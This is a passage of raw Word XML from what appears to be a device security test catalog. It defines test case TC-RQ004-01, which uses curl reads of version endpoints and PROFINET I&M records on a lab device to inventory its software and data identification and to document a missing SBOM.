          <w:p w14:paraId="04D07D3C" w14:textId="7B393035" w:rsidR="00136AF5" w:rsidRPr="008F3992"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F3992">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ifm CM-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D61219D" w14:textId="1358ABA2" w:rsidR="00136AF5" w:rsidRPr="008F3992"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F3992">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00136AF5" w:rsidRPr="00035F89" w14:paraId="459BC205"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6A6651E" w14:textId="77777777" w:rsidR="00136AF5" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CF9293B" w14:textId="77777777" w:rsidR="008F3992" w:rsidRPr="002C55B6"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C55B6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Data-identification fingerprint check: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B7BD88" w14:textId="77777777" w:rsidR="008F3992" w:rsidRPr="002C55B6"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C55B6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">read I&amp;M4 for config A; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28DAF117" w14:textId="77777777" w:rsidR="008F3992" w:rsidRPr="002C55B6"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C55B6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">load a different config B; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50976153" w14:textId="77777777" w:rsidR="00082D8A" w:rsidRPr="002C55B6"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C55B6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">read I&amp;M4; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="688222D6" w14:textId="2A29346F" w:rsidR="00136AF5" w:rsidRPr="006669AB" w:rsidRDefault="00801021"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2C55B6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm the signature uniquely characterises the loaded config</w:t>
            </w:r>
            <w:r w:rsidRPr="00801021">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="637F5E28" w14:textId="7AD74BA8" w:rsidR="000D1FFC" w:rsidRPr="00462D28" w:rsidRDefault="004C0133" w:rsidP="00082D8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62D28">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirms the partial DATA-identification control (corrects G-1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD844F3" w14:textId="74A6CC32" w:rsidR="00136AF5" w:rsidRPr="002C55B6" w:rsidRDefault="00890F4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C55B6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based verification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="284C0C62" w14:textId="77777777" w:rsidR="00890F42" w:rsidRPr="00890F42" w:rsidRDefault="00890F42" w:rsidP="00890F42">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0883DC01" w14:textId="27643A31" w:rsidR="00136AF5" w:rsidRPr="002C55B6" w:rsidRDefault="00DC679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C55B6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A6E07CE" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BA233D" w14:textId="77777777" w:rsidR="006578AA" w:rsidRDefault="006578AA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2E3F67" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="4"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="4"/>
      <w:r w:rsidR="009305A1">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="4"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55C966" w14:textId="77777777" w:rsidR="00890F42" w:rsidRDefault="00890F42" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA33CDB" w14:textId="1B13E641" w:rsidR="00CB0BEC" w:rsidRPr="00CB35D8" w:rsidRDefault="00CB0BEC" w:rsidP="00CB0BEC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ004-01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identification-Surface Inventory (SW + Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F0F90" w14:textId="77777777" w:rsidR="00890F42" w:rsidRPr="00DB074F" w:rsidRDefault="00890F42" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C17C174"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2C58F37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65754D" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D51F60B"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39C14B8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81E709" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7189424C" w14:textId="2E29DFB1" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="0075192E"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5192E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ004-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="6438891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7B65DD"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63FFB7BC" w14:textId="30FF1005" w:rsidR="00B73A1A" w:rsidRPr="00611347" w:rsidRDefault="00E654F6"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11347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-004 (EHSR identification obligation) → CR 7.8 → Asset D (SW) + Asset B (data via I&amp;M4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="619D4EC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7EF9FAD" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ECDA0C3" w14:textId="756EBC6B" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="00E654F6"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Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="2C9778F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AE3FE88" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47A8AA3B" w14:textId="0E5AC1E4" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="00E654F6"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SVV-1 (Requirement-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="4C8AFB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088C46" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="233FD8FA" w14:textId="77777777" w:rsidR="00246DD8" w:rsidRDefault="00246DD8"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46DD8">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerate the complete identification set the device exposes; confirm it identifies safety software (firmware/bootloader/stack versions) and safety data (parameter-set fingerprint via I&amp;M4); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44FA2C86" w14:textId="74BD7509" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="00246DD8"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46DD8">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>diff against the expected EHSR-critical SW+data set to reveal the SBOM completeness gap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="49CD35D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ADA84E5" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75F6DDFD" w14:textId="77777777" w:rsidR="009E2A3F" w:rsidRDefault="009E2A3F"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E2A3F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Retrieve all /deviceinfo/* version fields. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3A7D70" w14:textId="77777777" w:rsidR="009E2A3F" w:rsidRDefault="009E2A3F"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E2A3F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Read I&amp;M0, I&amp;M4 (signature), I&amp;M5. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70AFD9FF" w14:textId="77777777" w:rsidR="009E2A3F" w:rsidRDefault="009E2A3F"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E2A3F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Read /firmware/version, /fieldbussetup/fieldbusfirmware. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C28F1B2" w14:textId="57EB15CA" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="009E2A3F"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E2A3F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Compile the inventory; compare against the expected set (incl. third-party components).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="728C4BE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969261" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="026889FF" w14:textId="7F829CE7" w:rsidR="00F728AA" w:rsidRDefault="00F728AA"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F728AA">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS (partial-conformance baseline) if the device returns top-level SW identification and a data-identification fingerprint (I&amp;M4). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7A6BF5" w14:textId="50CA3CA3" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="00F728AA"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F728AA">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Documented shortfall if no SBOM of third-party components is present and no explicit safety-critical-data classification is exposed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B47C138" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACC4A19"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2F2D4D4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43893B" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BF488B5"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48CDFCC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AD8EF" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D614CD8" w14:textId="3AEC2D5E" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="003D0C68"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D0C68">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ004-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00F15AEA" w14:paraId="246CB08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66E69D" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49EA0640" w14:textId="77777777" w:rsidR="00D44C08" w:rsidRDefault="00D44C08"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44C08">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC002D6" w14:textId="77777777" w:rsidR="00D44C08" w:rsidRDefault="00D44C08"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44C08">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Pi mgmt eth1 = 192.168.50.10; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03A9CEBC" w14:textId="31FE8EFB" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="00D44C08"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44C08">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>browser 192.168.50.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="2DA38A5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8BD07A7" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06DB7EFE" w14:textId="2C7E086A" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="008C3E3B" w:rsidP="008C3E3B">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C3E3B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl / IoT-Core visualizer; PROFINET acyclic read for I&amp;M0/4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="219F6E0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5FF5B62" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A31799F"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 TC-RQ004-01 Full identification-surface enumeration (REVISION_COUNTER excluded)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47139184"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for ep in deviceinfo/hwversion deviceinfo/hwrevision deviceinfo/swrevision &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C25D1A"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deviceinfo/swinfo/cpubootloaderversion deviceinfo/swinfo/scpuversion &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7A9AB8"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deviceinfo/swinfo/scpubootloaderversion firmware/version firmware/type &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D8E4A60"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fieldbussetup/fieldbusfirmware ; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36C8344B"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echo "== $ep =="; curl -s "http://192.168.0.2/$ep";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="398AFEE8"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done | tee TC01_swid.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2461E612"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 I&amp;M0 (identity), I&amp;M4 (parameter-set FINGERPRINT = F_iParCRC + F_Par_CRC), I&amp;M5 (host fw) via acyclic PN read</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6061C3BF" w14:textId="5AC40792" w:rsidR="00B73A1A" w:rsidRPr="006669AB"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 NOTE: REVISION_COUNTER is NOT read here — it is modification evidence (RQ-009), not identification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="6D69CD8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C4D9F44" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00B876AA" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B876AA">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FAAB436" w14:textId="77777777" w:rsidR="003465B5" w:rsidRDefault="003465B5"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465B5">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SW versions returned; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F5F64AC" w14:textId="77777777" w:rsidR="003465B5" w:rsidRDefault="003465B5"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465B5">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">I&amp;M4 = F_iParCRC+F_Par_CRC (data fingerprint); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E3FCE6" w14:textId="12D0627F" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="003465B5"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465B5">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>no SBOM of µC/OS-II, PROFIsafe stack, STM STL, netX90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="2947CB5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EFDD8C9" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B724181" w14:textId="48BDECB3" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="003465B5" w:rsidP="00655E93">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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SW identified/ Data fingerprint (I&amp;M4) present/ No SBON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="0097451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2502AB6" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18834FC0" w14:textId="3DE0D060" w:rsidR="00B73A1A" w:rsidRPr="006669AB" w:rsidRDefault="00174FCE"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174FCE">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC01_swid.txt, I&amp;M0/4/5 read logs, inventory-vs-expected diff table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47CBE2FF" w14:textId="446CABC0" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
